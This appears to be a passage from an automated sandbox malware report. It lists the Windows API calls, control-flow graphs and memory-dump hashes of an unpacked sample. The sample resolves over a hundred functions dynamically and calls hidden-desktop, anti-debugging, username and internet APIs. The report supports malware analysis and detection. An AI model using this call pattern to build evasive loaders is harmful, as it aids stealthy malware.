                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$InternetOpen
                                                              • String ID: "$------
                                                              • API String ID: 2041821634-2370822465
                                                              • Opcode ID: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
                                                              • Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
                                                              • Opcode Fuzzy Hash: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
                                                              • Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
                                                              • LdrInitializeThunk.NTDLL ref: 00404A4F
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
                                                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
                                                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                              • API String ID: 2971326882-3329630956
                                                              • Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                              • Instruction ID: 31bf12c2d79e338fb7f97826348345d32b3aa4c96b478bc01bd0f7d9a8ca19b4
                                                              • Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                              • Instruction Fuzzy Hash: F531E920F4823C7F86206BA56C45BDFBED4DF8E750F389053F51855184C9A864058EE9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2207 4263c0-4263ed GetPEB 2208 4265f3-426653 LoadLibraryA * 5 2207->2208 2209 4263f3-4265ee call 426320 GetProcAddress * 20 2207->2209 2211 426655-426663 GetProcAddress 2208->2211 2212 426668-42666f 2208->2212 2209->2208 2211->2212 2214 426671-426697 GetProcAddress * 2 2212->2214 2215 42669c-4266a3 2212->2215 2214->2215 2216 4266a5-4266b3 GetProcAddress 2215->2216 2217 4266b8-4266bf 2215->2217 2216->2217 2219 4266c1-4266cf GetProcAddress 2217->2219 2220 4266d4-4266db 2217->2220 2219->2220 2221 426707-42670a 2220->2221 2222 4266dd-426702 GetProcAddress * 2 2220->2222 2222->2221
                                                              APIs
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B7B0), ref: 00426419
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B810), ref: 00426432
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B858), ref: 0042644A
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B948), ref: 00426462
                                                              • GetProcAddress.KERNEL32(74DD0000,009E65F8), ref: 0042647B
                                                              • GetProcAddress.KERNEL32(74DD0000,009E48F0), ref: 00426493
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4B70), ref: 004264AB
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B678), ref: 004264C4
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B870), ref: 004264DC
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B660), ref: 004264F4
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B8E8), ref: 0042650D
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4950), ref: 00426525
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B7C8), ref: 0042653D
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B8A0), ref: 00426556
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4A90), ref: 0042656E
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B6A8), ref: 00426586
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B888), ref: 0042659F
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4AF0), ref: 004265B7
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B8D0), ref: 004265CF
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4B90), ref: 004265E8
                                                              • LoadLibraryA.KERNEL32(00A0B708,?,?,?,00421BE3), ref: 004265F9
                                                              • LoadLibraryA.KERNEL32(00A0B930,?,?,?,00421BE3), ref: 0042660B
                                                              • LoadLibraryA.KERNEL32(00A0B918,?,?,?,00421BE3), ref: 0042661D
                                                              • LoadLibraryA.KERNEL32(00A0B750,?,?,?,00421BE3), ref: 0042662E
                                                              • LoadLibraryA.KERNEL32(00A0B768,?,?,?,00421BE3), ref: 00426640
                                                              • GetProcAddress.KERNEL32(75A70000,00A0B690), ref: 0042665D
                                                              • GetProcAddress.KERNEL32(75290000,00A0B7E0), ref: 00426679
                                                              • GetProcAddress.KERNEL32(75290000,00A0B8B8), ref: 00426691
                                                              • GetProcAddress.KERNEL32(75BD0000,00A0B780), ref: 004266AD
                                                              • GetProcAddress.KERNEL32(75450000,009E4BD0), ref: 004266C9
                                                              • GetProcAddress.KERNEL32(76E90000,009E6618), ref: 004266E5
                                                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004266FC
                                                              Strings
                                                              • NtQueryInformationProcess, xrefs: 004266F1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: NtQueryInformationProcess
                                                              • API String ID: 2238633743-2781105232
                                                              • Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                              • Instruction ID: 7b5cedaa0e73423a59cdd3f572970276683dffd84f65f372ce21167b4aa31ce5
                                                              • Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                              • Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683364DBB4A900DFB0
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00422A16
                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocNameProcessUser
                                                              • String ID:
                                                              • API String ID: 1206570057-0
                                                              • Opcode ID: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
                                                              • Instruction ID: aa6ded6259508bede27090f4c861d2ca31da26e1ef70df7e495680ac72f078f7
                                                              • Opcode Fuzzy Hash: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
                                                              • Instruction Fuzzy Hash: 95F054B1A44614AFD710DF98DD49B9ABBBCF744B65F10021AF915E3680D7B419048BE1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 633 426710-426717 634 426b2e-426bc2 LoadLibraryA * 8 633->634 635 42671d-426b29 GetProcAddress * 43 633->635 636 426bc4-426c33 GetProcAddress * 5 634->636 637 426c38-426c3f 634->637 635->634 636->637 638 426d02-426d09 637->638 639 426c45-426cfd GetProcAddress * 8 637->639 640 426d0b-426d7a GetProcAddress * 5 638->640 641 426d7f-426d86 638->641 639->638 640->641 642 426e19-426e20 641->642 643 426d8c-426e14 GetProcAddress * 6 641->643 644 426f40-426f47 642->644 645 426e26-426f3b GetProcAddress * 12 642->645 643->642 646 426f49-426fb8 GetProcAddress * 5 644->646 647 426fbd-426fc4 644->647 645->644 646->647 648 426ff1-426ff8 647->648 649 426fc6-426fec GetProcAddress * 2 647->649 650 427025-42702c 648->650 651 426ffa-427020 GetProcAddress * 2 648->651 649->648 652 427032-427118 GetProcAddress * 10 650->652 653 42711d-427124 650->653 651->650 652->653 654 427182-427189 653->654 655 427126-42717d GetProcAddress * 4 653->655 656 42718b-427199 GetProcAddress 654->656 657 42719e-4271a5 654->657 655->654 656->657 658 427203 657->658 659 4271a7-4271fe GetProcAddress * 4 657->659 659->658
                                                              APIs
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4B30), ref: 00426725
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4AB0), ref: 0042673D
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B9A8), ref: 00426756
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0BA20), ref: 0042676E
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B960), ref: 00426786
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B9C0), ref: 0042679F
                                                              • GetProcAddress.KERNEL32(74DD0000,009E8FF8), ref: 004267B7
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B9D8), ref: 004267CF
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0BA08), ref: 004267E8
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0B9F0), ref: 00426800
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DF60), ref: 00426818
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4C10), ref: 00426831
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4AD0), ref: 00426849
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4970), ref: 00426861
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4990), ref: 0042687A
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0E110), ref: 00426892
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DFD8), ref: 004268AA
                                                              • GetProcAddress.KERNEL32(74DD0000,009E91B0), ref: 004268C3
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4C90), ref: 004268DB
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DE88), ref: 004268F3
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DF78), ref: 0042690C
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0E020), ref: 00426924
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DE40), ref: 0042693C
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4C30), ref: 00426955
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DF90), ref: 0042696D
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0E038), ref: 00426985
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DE58), ref: 0042699E
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0E068), ref: 004269B6
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DE70), ref: 004269CE
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DEA0), ref: 004269E7
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DEB8), ref: 004269FF
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DED0), ref: 00426A17
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DF30), ref: 00426A30
                                                              • GetProcAddress.KERNEL32(74DD0000,009E8BF0), ref: 00426A48
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0E050), ref: 00426A60
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DEE8), ref: 00426A79
                                                              • GetProcAddress.KERNEL32(74DD0000,009E4A50), ref: 00426A91
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0DF00), ref: 00426AA9
                                                              • GetProcAddress.KERNEL32(74DD0000,009E48B0), ref: 00426AC2
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0E128), ref: 00426ADA
                                                              • GetProcAddress.KERNEL32(74DD0000,00A0E0B0), ref: 00426AF2
                                                              • GetProcAddress.KERNEL32(74DD0000,009E49B0), ref: 00426B0B
                                                              • GetProcAddress.KERNEL32(74DD0000,009E49D0), ref: 00426B23
                                                              • LoadLibraryA.KERNEL32(00A0DFA8,0042067A), ref: 00426B35
                                                              • LoadLibraryA.KERNEL32(00A0DF18), ref: 00426B46
                                                              • LoadLibraryA.KERNEL32(00A0E080), ref: 00426B58
                                                              • LoadLibraryA.KERNEL32(00A0DF48), ref: 00426B6A
                                                              • LoadLibraryA.KERNEL32(00A0DFC0), ref: 00426B7B
                                                              • LoadLibraryA.KERNEL32(00A0DFF0), ref: 00426B8D
                                                              • LoadLibraryA.KERNEL32(00A0E008), ref: 00426B9F
                                                              • LoadLibraryA.KERNEL32(00A0E098), ref: 00426BB0
                                                              • GetProcAddress.KERNEL32(75290000,009E4A10), ref: 00426BCC
                                                              • GetProcAddress.KERNEL32(75290000,00A0E0E0), ref: 00426BE4
                                                              • GetProcAddress.KERNEL32(75290000,00A0BAD8), ref: 00426BFD
                                                              • GetProcAddress.KERNEL32(75290000,00A0E0C8), ref: 00426C15
                                                              • GetProcAddress.KERNEL32(75290000,009E4EF0), ref: 00426C2D
                                                              • GetProcAddress.KERNEL32(73440000,009E8FA8), ref: 00426C4D
                                                              • GetProcAddress.KERNEL32(73440000,009E4FF0), ref: 00426C65
                                                              • GetProcAddress.KERNEL32(73440000,009E9200), ref: 00426C7E
                                                              • GetProcAddress.KERNEL32(73440000,00A0E0F8), ref: 00426C96
                                                              • GetProcAddress.KERNEL32(73440000,00A0E140), ref: 00426CAE
                                                              • GetProcAddress.KERNEL32(73440000,009E4F70), ref: 00426CC7
                                                              • GetProcAddress.KERNEL32(73440000,009E4F90), ref: 00426CDF
                                                              • GetProcAddress.KERNEL32(73440000,00A0E188), ref: 00426CF7
                                                              • GetProcAddress.KERNEL32(752C0000,009E5050), ref: 00426D13
                                                              • GetProcAddress.KERNEL32(752C0000,009E4CD0), ref: 00426D2B
                                                              • GetProcAddress.KERNEL32(752C0000,00A0E1E8), ref: 00426D44
                                                              • GetProcAddress.KERNEL32(752C0000,00A0E1A0), ref: 00426D5C
                                                              • GetProcAddress.KERNEL32(752C0000,009E4DD0), ref: 00426D74
                                                              • GetProcAddress.KERNEL32(74EC0000,009E9020), ref: 00426D94
                                                              • GetProcAddress.KERNEL32(74EC0000,009E9250), ref: 00426DAC
                                                              • GetProcAddress.KERNEL32(74EC0000,00A0E200), ref: 00426DC5
                                                              • GetProcAddress.KERNEL32(74EC0000,009E4E50), ref: 00426DDD
                                                              • GetProcAddress.KERNEL32(74EC0000,009E5030), ref: 00426DF5
                                                              • GetProcAddress.KERNEL32(74EC0000,009E9098), ref: 00426E0E
                                                              • GetProcAddress.KERNEL32(75BD0000,00A0E1B8), ref: 00426E2E
                                                              • GetProcAddress.KERNEL32(75BD0000,009E4EB0), ref: 00426E46
                                                              • GetProcAddress.KERNEL32(75BD0000,00A0BBB8), ref: 00426E5F
                                                              • GetProcAddress.KERNEL32(75BD0000,00A0E1D0), ref: 00426E77
                                                              • GetProcAddress.KERNEL32(75BD0000,00A0E158), ref: 00426E8F
                                                              • GetProcAddress.KERNEL32(75BD0000,009E4F50), ref: 00426EA8
                                                              • GetProcAddress.KERNEL32(75BD0000,009E4CF0), ref: 00426EC0
                                                              • GetProcAddress.KERNEL32(75BD0000,00A0E170), ref: 00426ED8
                                                              • GetProcAddress.KERNEL32(75BD0000,00A0E320), ref: 00426EF1
                                                              • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00426F07
                                                              • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00426F1E
                                                              • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00426F35
                                                              • GetProcAddress.KERNEL32(75A70000,009E4CB0), ref: 00426F51
                                                              • GetProcAddress.KERNEL32(75A70000,00A0E2D8), ref: 00426F69
                                                              • GetProcAddress.KERNEL32(75A70000,00A0E518), ref: 00426F82
                                                              • GetProcAddress.KERNEL32(75A70000,00A0E260), ref: 00426F9A
                                                              • GetProcAddress.KERNEL32(75A70000,00A0E338), ref: 00426FB2
                                                              • GetProcAddress.KERNEL32(75450000,009E5010), ref: 00426FCE
                                                              • GetProcAddress.KERNEL32(75450000,009E4FB0), ref: 00426FE6
                                                              • GetProcAddress.KERNEL32(75DA0000,009E4D10), ref: 00427002
                                                              • GetProcAddress.KERNEL32(75DA0000,00A0E3E0), ref: 0042701A
                                                              • GetProcAddress.KERNEL32(6F070000,009E4E70), ref: 0042703A
                                                              • GetProcAddress.KERNEL32(6F070000,009E4D70), ref: 00427052
                                                              • GetProcAddress.KERNEL32(6F070000,009E4FD0), ref: 0042706B
                                                              • GetProcAddress.KERNEL32(6F070000,00A0E308), ref: 00427083
                                                              • GetProcAddress.KERNEL32(6F070000,009E4D30), ref: 0042709B
                                                              • GetProcAddress.KERNEL32(6F070000,009E4ED0), ref: 004270B4
                                                              • GetProcAddress.KERNEL32(6F070000,009E4E90), ref: 004270CC
                                                              • GetProcAddress.KERNEL32(6F070000,009E4D50), ref: 004270E4
                                                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004270FB
                                                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00427112
                                                              • GetProcAddress.KERNEL32(75AF0000,00A0E2C0), ref: 0042712E
                                                              • GetProcAddress.KERNEL32(75AF0000,00A0BB58), ref: 00427146
                                                              • GetProcAddress.KERNEL32(75AF0000,00A0E350), ref: 0042715F
                                                              • GetProcAddress.KERNEL32(75AF0000,00A0E278), ref: 00427177
                                                              • GetProcAddress.KERNEL32(75D90000,009E4F10), ref: 00427193
                                                              • GetProcAddress.KERNEL32(6C280000,00A0E368), ref: 004271AF
                                                              • GetProcAddress.KERNEL32(6C280000,009E4F30), ref: 004271C7
                                                              • GetProcAddress.KERNEL32(6C280000,00A0E380), ref: 004271E0
                                                              • GetProcAddress.KERNEL32(6C280000,00A0E290), ref: 004271F8
                                                              Strings
                                                              Memory Dump Source
